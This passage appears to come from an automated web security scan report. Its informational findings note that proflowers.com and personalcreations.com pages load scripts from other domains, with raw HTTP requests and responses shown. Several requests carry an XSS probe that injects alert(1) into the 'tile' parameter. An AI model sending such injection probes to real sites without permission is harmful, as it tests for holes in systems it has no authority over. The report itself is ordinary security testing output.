xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
    <script type="text/javascript" src="http://www.ftdimg.com/v20110407/js/compressed-jcarousel.js"></script>
...[SNIP]...
</script>

   <script type="text/javascript" src="http://www.ftdimg.com/js/tealeaf.js"></script>
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/foresee-alive.js"></script>
...[SNIP]...
<!-- MyBuys setup files -->
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys3.js"></script>
<script type="text/javascript" src="http://www.ftdimg.com/pics/foresee/11-04-17-13-12/mybuys-setup.js"></script>
...[SNIP]...
<!-- Start Pixel code for netmining_pixel -->
<script src="https://ftd.netmng.com/?aid=181" type="text/javascript" defer="defer"></script>
...[SNIP]...
<!-- printing out our omniture js file shared by both dev and production -->
<script language="JavaScript" src="http://www.ftdimg.com/js/omniture.js"></script>
...[SNIP]...
17.26. http://www.personalcreations.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.personalcreations.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=wz0kwfor3fvne2lfjnllwoah; domain=personalcreations.com; path=/
Set-Cookie: ASP.NET_SessionId=wz0kwfor3fvne2lfjnllwoah; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PCR=TestAssignmentValues=nta-1,ttb-3,nte-3,ntc-2,tpr-1,ntb-1,xta-1,tpp-4,tbc-2,ntd-1,xtc-1,tmm-1,xtb-1,trr-2,tvo-1,tpf-1; domain=.personalcreations.com; expires=Sat, 09-Jun-2012 12:23:17 GMT; path=/
Set-Cookie: ENDOFDAY_PCR=TestAssignmentValues=,txb-1,tkt-2,thp-2,txa-2,tks-1,txc-1,mpsmediapersonalitysplit-2; domain=.personalcreations.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PCR=TestConfigDateTimeUpdated=5/9/2011 5:23:17 AM; domain=.personalcreations.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=5; domain=.personalcreations.com; expires=Thu, 12-May-2011 12:23:17 GMT; path=/
Set-Cookie: PCR_BrowserId=7e39bf7a-035a-482a-a5ba-f1400b3f220a; domain=.personalcreations.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PCR_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.personalcreations.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:23:19 GMT
Content-Length: 120465


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">
   <head><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/st
...[SNIP]...
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="outerContainer">
               

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="TopNav"> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/common_pcr.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/yahoo-dom-event.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/get-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/datasource-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/connection-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/animation-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete//json-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/yui/autocomplete/autocomplete-min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="heroElements">
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
</div>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.27. http://www.proflowers.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: BrowsingStore=vdbbjo2ye2hg5x4cildhrv3t; domain=proflowers.com; path=/
Set-Cookie: ASP.NET_SessionId=vdbbjo2ye2hg5x4cildhrv3t; path=/; HttpOnly
Set-Cookie: THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-2,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-7,nte-3,phl-2,ppv-3,phr-1,nta-1,xpc-1,ntb-1,pnp-1,ppr-1,pmm-2,pem-1,pfe-3,pml-0; domain=.proflowers.com; expires=Sat, 09-Jun-2012 12:07:41 GMT; path=/
Set-Cookie: ENDOFDAY_PFC=TestAssignmentValues=,pxc-3,mpsmediapersonalitysplit-1,zzd-1,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; domain=.proflowers.com; expires=Tue, 10-May-2011 06:59:59 GMT; path=/
Set-Cookie: CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:41 AM; domain=.proflowers.com; path=/
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243; domain=.proflowers.com; path=/
Set-Cookie: PRVD=SiteSplitID=50; domain=.proflowers.com; expires=Thu, 12-May-2011 12:07:41 GMT; path=/
Set-Cookie: PFC_BrowserId=92c68dc8-4b77-41de-89a7-78ac8cdfbbd3; domain=.proflowers.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:07:40 GMT
Content-Length: 88497


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
<meta name="msvalidate.01" content="77940E049C181974C3AA656C72688B4C" />


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="topMain" class="clearfix">
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
   * This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
   * http://www.opinionlab.com
-->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<!--ooend-->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.28. http://www.proflowers.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:24 AM?30003767&5/9/2011 5:13:31 AM; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fdefault.aspx%25253Ftile%25253Dhmpg_hero16c36a%2525255c%25252522%2525253balert(1)%2525252f%2525252fdecb137eb0b%252526Ref%25253DHo%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:17:43 GMT
Content-Length: 95799


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
<meta name="msvalidate.01" content="77940E049C181974C3AA656C72688B4C" />


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="topMain" class="clearfix">
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery.cycle.all.latest.min.js"></script>
...[SNIP]...
</div>

       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
e is prohibited.
   * This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.
   * http://www.opinionlab.com
-->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
<!--ooend-->
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.29. http://www.proflowers.com/house-plants-PBS  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /house-plants-PBS

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fhouse-plants-PBS%25253Ftile%25253Dhmpg_podA%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:43 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:10:43 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:10:43 GMT
Content-Length: 184823


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
</span> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
17.30. http://www.proflowers.com/mothers-day-flowers-MDF  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /mothers-day-flowers-MDF

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mothers-day-flowers-MDF?tile=hmpg_hero1&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
